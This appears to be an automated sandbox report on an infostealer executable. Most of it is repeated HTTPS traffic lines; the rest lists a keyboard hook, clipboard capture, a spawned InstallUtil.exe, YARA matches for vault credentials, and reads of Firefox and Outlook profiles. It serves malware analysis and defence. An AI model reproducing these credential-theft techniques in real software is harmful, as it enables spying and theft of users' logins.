                    Source: unknownNetwork traffic detected: HTTP traffic on port 55229 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55504 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55350 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55293
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55995 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53093 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50666 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55257 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55444 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54884
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53310
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54768
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55509 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55395 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55268 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53770 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51381
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53224 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54815
                    Source: unknownNetwork traffic detected: HTTP traffic on port 52653 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55558 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53325 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53331 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52993
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54257
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54499
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52077
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55229
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55345
                    Source: unknownNetwork traffic detected: HTTP traffic on port 54989 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52082
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54260
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54265
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52087
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52084
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55350
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55471
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53938 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53749 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53074 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53240 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 52052 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55496 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52640
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55119
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52644
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55114
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52642
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55362
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54270
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51855 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53004 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53507
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53749
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53505
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53772 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55003
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52653
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53766 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55496
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51860 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53074
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55130
                    Source: unknownNetwork traffic detected: HTTP traffic on port 54329 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53372 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51384 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 52251 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 52738 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55257
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53512
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53511
                    Source: unknownNetwork traffic detected: HTTP traffic on port 52642 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55462 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51515 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50504 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51869
                    Source: unknownNetwork traffic detected: HTTP traffic on port 52993 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53004
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51860
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54575
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55548
                    Source: unknownNetwork traffic detected: HTTP traffic on port 54815 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55428
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50652
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51864
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53370
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55551
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53374
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53232 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53372
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53309 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55442 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55551 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 52056 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51515
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53936
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50666
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53370 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53939
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53938
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54466
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55558
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53375
                    Source: unknownNetwork traffic detected: HTTP traffic on port 54575 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 52623 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50665
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50664
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55314
                    Source: unknownNetwork traffic detected: HTTP traffic on port 52640 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 52256 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53310 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55442
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52052
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51389 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52616
                    Source: unknownNetwork traffic detected: HTTP traffic on port 52244 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52735
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52738
                    Source: unknownNetwork traffic detected: HTTP traffic on port 54265 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53233 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52056
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52612
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55444
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52059
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53941
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55000 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52061
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55293 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53227 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55331
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55331 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 54365 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 52612 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 52740 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 54325 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50503 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52626
                    Source: unknownNetwork traffic detected: HTTP traffic on port 54260 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55314 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52740
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54367
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53773 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54365
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52743
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52623
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53767 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55462
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53507 -> 443
                    Source: unknownHTTPS traffic detected: 140.82.114.3:443 -> 192.168.2.4:49731 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.190.93:443 -> 192.168.2.4:51515 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 102.223.20.217:443 -> 192.168.2.4:54575 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.190.93:443 -> 192.168.2.4:55000 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 222.255.238.159:443 -> 192.168.2.4:55558 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: 0.2.n1KVzXM8Wk.exe.119a41201a0.1.raw.unpack, hxAF.cs.Net Code: q5I7xZc
                    Source: 0.2.n1KVzXM8Wk.exe.119a54310f8.2.raw.unpack, hxAF.cs.Net Code: q5I7xZc
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                    System Summary

                    barindex
                    Source: 0.2.n1KVzXM8Wk.exe.119a41201a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.n1KVzXM8Wk.exe.119a41201a0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.n1KVzXM8Wk.exe.119a54310f8.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.n1KVzXM8Wk.exe.119a54310f8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.n1KVzXM8Wk.exe.119a408fd68.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess Stats: CPU usage > 49%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_031A9BE35_2_031A9BE3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_031A4A985_2_031A4A98
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_031A3E805_2_031A3E80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_031ACEB05_2_031ACEB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_031A41C85_2_031A41C8
                    Source: n1KVzXM8Wk.exeStatic PE information: No import functions for PE file found
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A51F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedcee1200-43ec-4018-aeeb-4f86e30beb01.exe4 vs n1KVzXM8Wk.exe
                    Source: n1KVzXM8Wk.exe, 00000000.00000000.1692824037.0000011991F72000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMakeForever.exe8 vs n1KVzXM8Wk.exe
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A408F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOxeyijahal> vs n1KVzXM8Wk.exe
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A408F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedcee1200-43ec-4018-aeeb-4f86e30beb01.exe4 vs n1KVzXM8Wk.exe
                    Source: n1KVzXM8Wk.exeBinary or memory string: OriginalFilenameMakeForever.exe8 vs n1KVzXM8Wk.exe
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: edputil.dllJump to behavior
                    Source: 0.2.n1KVzXM8Wk.exe.119a41201a0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.n1KVzXM8Wk.exe.119a41201a0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.n1KVzXM8Wk.exe.119a54310f8.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.n1KVzXM8Wk.exe.119a54310f8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.n1KVzXM8Wk.exe.119a408fd68.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.n1KVzXM8Wk.exe.119a41201a0.1.raw.unpack, N43UVggPg.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.n1KVzXM8Wk.exe.119a41201a0.1.raw.unpack, N43UVggPg.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.n1KVzXM8Wk.exe.119a41201a0.1.raw.unpack, Ow96S4wT.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.n1KVzXM8Wk.exe.119a41201a0.1.raw.unpack, Ow96S4wT.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.n1KVzXM8Wk.exe.119a41201a0.1.raw.unpack, Ow96S4wT.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.n1KVzXM8Wk.exe.119a41201a0.1.raw.unpack, Ow96S4wT.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.n1KVzXM8Wk.exe.119a41201a0.1.raw.unpack, MjzNdC.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.n1KVzXM8Wk.exe.119a41201a0.1.raw.unpack, MjzNdC.csCryptographic APIs: 'TransformFinalBlock'
                    Source: n1KVzXM8Wk.exe, GetOrCreateEventHandlegetNativeErrorCode.csTask registration methods: 'UnconditionalSuppressMessageAttributeOverlappedValueTaskSource', 'getAsyncWaitHandleTaskScheduled'
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@3/3@5/100
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\n1KVzXM8Wk.exe.logJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                    Source: n1KVzXM8Wk.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: n1KVzXM8Wk.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: n1KVzXM8Wk.exeReversingLabs: Detection: 21%
                    Source: n1KVzXM8Wk.exeVirustotal: Detection: 23%
                    Source: unknownProcess created: C:\Users\user\Desktop\n1KVzXM8Wk.exe C:\Users\user\Desktop\n1KVzXM8Wk.exe
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exeJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
